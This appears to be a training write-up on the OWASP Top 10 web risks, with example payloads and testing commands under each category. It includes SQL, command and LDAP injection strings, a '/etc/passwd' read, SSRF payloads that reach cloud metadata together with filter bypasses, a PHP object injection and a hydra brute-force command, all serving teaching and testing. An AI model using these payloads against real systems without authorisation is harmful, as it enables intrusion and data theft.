OWASP Top 10

intermediate1h 30mWriteup

Learn the OWASP Top 10 vulnerabilities

Learning Objectives

  • Understand OWASP Top 10
  • Exploit each vulnerability type
  • Practice on real examples
  • Learn mitigations

The OWASP Top 10 represents the most critical web application security risks. Updated every few years by the Open Web Application Security Project, it's the definitive checklist for web security testing. Think of it as the "greatest hits" of web vulnerabilities!

OWASP Top 10 2021 reorganized categories and introduced new risks like Insecure Design (A04). Understanding these categories helps you systematically test web applications.

A01: Broken Access Control

Access control enforces that users cannot act outside their intended permissions. When broken, attackers access unauthorized functionality or data.

bash
1606070;"># IDOR (Insecure Direct Object Reference)
2606070;"># Original URL (your profile)
3GET /api/users/1001
4 
5606070;"># Modified URL (someone else's profile)
6GET /api/users/1002
7606070;"># If accessible, that's IDOR!
8 
9606070;"># Horizontal privilege escalation
10606070;"># User A accessing User B's data at same privilege level
11 
12606070;"># Vertical privilege escalation
13606070;"># Regular user accessing admin functionality
14GET /admin/dashboard
15GET /admin/users/delete/1001
16 
17606070;"># Testing tips:
18606070;"># - Change ID parameters
19606070;"># - Try accessing admin endpoints
20606070;"># - Modify JWT tokens
21606070;"># - Force browse to restricted pages

IDOR Testing

Create two accounts. Log into Account A, capture requests, log into Account B, replay Account A's requests with Account B's session. If successful, you found IDOR!

A02: Cryptographic Failures

Formerly "Sensitive Data Exposure," this covers failures in cryptography that lead to sensitive data exposure.

bash
1606070;"># Common issues:
2 
3606070;"># Weak or deprecated algorithms
4MD5, SHA1, DES, RC4 - all broken!
5 
6606070;"># Hardcoded or weak keys
7password = 606070;">#a5d6ff;">"admin123"
8api_key = 606070;">#a5d6ff;">"12345"
9 
10606070;"># Missing encryption
11606070;"># HTTP instead of HTTPS
12606070;"># Passwords stored in plaintext
13 
14606070;"># Testing:
15606070;"># - Check for HTTPS everywhere
16606070;"># - Analyze cookies (Secure flag, encryption)
17606070;"># - Look for sensitive data in responses
18606070;"># - Check database dumps for plaintext
19 
20606070;"># Example: Finding sensitive data
21606070;"># Robots.txt or .git exposed
22curl http:606070;">//target.com/.git/config
23curl http:606070;">//target.com/backup.sql

A03: Injection

User-supplied data is sent to an interpreter as part of a command or query. SQL injection, Command injection, LDAP injection all fall here.

bash
1606070;"># SQL Injection
2606070;">#a5d6ff;">' OR '1'='1
3606070;">#a5d6ff;">' OR '1'='1' --
4' UNION SELECT null,username,password FROM users--
5 
6606070;"># Command Injection
7; ls -la
8| cat /etc/passwd
9`whoami`
10$(id)
11 
12606070;"># LDAP Injection
13*)(uid=*))(|(uid=*
14admin)(|(password=*
15 
16606070;"># XPath Injection
17606070;">#a5d6ff;">' or '1'='1
18606070;">#a5d6ff;">' or ''='
19 
20606070;"># Testing methodology:
21606070;"># 1. Identify input points
22606070;"># 2. Submit special characters
23606070;"># 3. Observe for errors or behavior changes
24606070;"># 4. Exploit to extract data
Injection remains one of the most dangerous vulnerabilities. A single SQL injection can lead to complete database compromise, including reading, modifying, and deleting all data.

A04: Insecure Design

New in 2021! Focuses on flaws in design and architecture rather than implementation bugs. No amount of fixing code helps a fundamentally flawed design.

1606070;"># Examples:
2 
3606070;"># Password recovery via security questions
4606070;"># "What's your mother's maiden name?" - easily researched!
5 
6606070;"># No rate limiting on login
7606070;"># Allows unlimited brute force attempts
8 
9606070;"># Trust boundaries ignored
10606070;"># Frontend validation only, no backend checks
11 
12606070;"># Insufficient fraud controls
13606070;"># Unlimited discount code usage
14606070;"># Price manipulation via client-side values
15 
16606070;"># Defense:
17606070;"># - Threat modeling during design
18606070;"># - Security user stories
19606070;"># - Reference secure design patterns

A05: Security Misconfiguration

bash
1606070;"># Common misconfigurations:
2 
3606070;"># Default credentials
4admin:admin
5admin:password
6root:root
7 
8606070;"># Unnecessary features enabled
9606070;"># Directory listing
10curl http:606070;">//target.com/images/
11 
12606070;"># Verbose error messages
13606070;"># Stack traces revealing paths, versions
14 
15606070;"># Open cloud storage
16aws s3 ls s3:606070;">//target-bucket --no-sign-request
17 
18606070;"># Exposed admin interfaces
19/admin
20/manager
21/phpmyadmin
22/wp-admin
23 
24606070;"># Unnecessary HTTP methods
25curl -X OPTIONS http:606070;">//target.com/ -v
26606070;"># PUT, DELETE, TRACE enabled
27 
28606070;"># Testing:
29606070;"># - Check default pages
30606070;"># - Review HTTP headers
31606070;"># - Enumerate directories
32606070;"># - Check for backups (.bak, ~)

A06: Vulnerable Components

Using components with known vulnerabilities. Libraries, frameworks, and other software modules with documented CVEs.

bash
1606070;"># Identification methods:
2606070;"># - Version numbers in responses
3606070;"># - /readme.txt, /changelog.txt
4606070;"># - Error messages revealing versions
5606070;"># - Wappalyzer browser extension
6 
7606070;"># CVE databases:
8606070;"># - cvedetails.com
9606070;"># - nvd.nist.gov
10606070;"># - exploit-db.com
11 
12606070;"># Example vulnerable components:
13606070;"># Log4Shell (Log4j) - CVE-2021-44228
14606070;"># Apache Struts - CVE-2017-5638
15606070;"># jQuery File Upload - CVE-2018-9206
16 
17606070;"># Automated scanning:
18nmap --script=vulners TARGET_IP
19nikto -h http:606070;">//TARGET_IP
20 
21606070;"># searchsploit
22searchsploit apache 2.4.49
23searchsploit wordpress 5.0
Always note version numbers during reconnaissance. Even if there's no immediate exploit, vulnerabilities may be disclosed later.

A07: Authentication Failures

bash
1606070;"># Weak passwords allowed
2password
3123456
4admin123
5 
6606070;"># No brute force protection
7hydra -l admin -P rockyou.txt target http-post-form 606070;">#a5d6ff;">"/login:user=^USER^&pass=^PASS^:Invalid"
8 
9606070;"># Session management issues:
10606070;"># - Session ID in URL
11606070;"># - Sessions don't expire
12606070;"># - Session fixation possible
13606070;"># - No re-authentication for sensitive actions
14 
15606070;"># Credential stuffing
16606070;"># Using leaked credentials from breaches
17 
18606070;"># Testing:
19606070;"># - Try common passwords
20606070;"># - Check lockout policies
21606070;"># - Analyze session tokens
22606070;"># - Test password reset flows

A08: Software and Data Integrity Failures

New category combining Insecure Deserialization with new risks around CI/CD pipelines and software updates without integrity verification.

bash
1606070;"># Insecure Deserialization
2606070;"># Java serialized object (starts with rO0)
3606070;"># PHP serialized object (a:2:{...})
4606070;"># Python pickle
5 
6606070;"># Example PHP object injection:
7O:4:606070;">#a5d6ff;">"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}
8 
9606070;"># CI/CD risks:
10606070;"># - Unsigned updates
11606070;"># - Compromised build servers
12606070;"># - No integrity checks on dependencies
13 
14606070;"># Testing:
15606070;"># - Look for serialized data in cookies/parameters
16606070;"># - Test object manipulation
17606070;"># - Check update mechanisms

A09: Security Logging and Monitoring Failures

1606070;"># What should be logged:
2606070;"># - Login attempts (success and failure)
3606070;"># - Access control failures
4606070;"># - Input validation failures
5606070;"># - Errors and exceptions
6 
7606070;"># Common failures:
8606070;"># - No logging at all
9606070;"># - Logs not monitored
10606070;"># - Logs stored only locally
11606070;"># - Insufficient detail
12 
13606070;"># Why it matters:
14606070;"># - Attackers go undetected
15606070;"># - No forensic trail
16606070;"># - Compliance violations
17 
18606070;"># From attacker perspective:
19606070;"># - Check if actions are logged
20606070;"># - Test if alerts are triggered
21606070;"># - Look for log poisoning opportunities

A10: Server-Side Request Forgery (SSRF)

bash
1606070;"># SSRF allows attackers to make requests FROM the server
2 
3606070;"># Basic SSRF
4GET /fetch?url=http:606070;">//internal-server:8080/admin
5 
6606070;"># Cloud metadata (AWS)
7GET /fetch?url=http:606070;">//169.254.169.254/latest/meta-data/
8 
9606070;"># Internal port scanning
10GET /fetch?url=http:606070;">//localhost:22
11GET /fetch?url=http:606070;">//localhost:3306
12 
13606070;"># File access (if file:// allowed)
14GET /fetch?url=file:606070;">///etc/passwd
15 
16606070;"># Common vulnerable parameters:
17606070;"># url=, uri=, src=, path=, dest=, redirect=
18606070;"># domain=, site=, host=, img=, pdf=
19 
20606070;"># Bypass techniques:
21http:606070;">//127.0.0.1:80
22http:606070;">//2130706433 (decimal)
23http:606070;">//0x7f000001 (hex)
24http:606070;">//[::1] (IPv6)
25http:606070;">//spoofed.burpcollaborator.net

Blind SSRF

Use Burp Collaborator or webhook.site to detect blind SSRF where you can't see the response but can observe the request being made.

Knowledge Check

Quick Quiz
Question 1 of 3

What is IDOR?

Key Takeaways

  • Broken Access Control is now the #1 risk (moved from #5)
  • Injection remains critical - always validate and sanitize input
  • Insecure Design is a new category requiring architecture review
  • SSRF (new to top 10) can access internal services and cloud metadata
  • Use OWASP Top 10 as a checklist for web application testing
  • Component vulnerabilities require continuous monitoring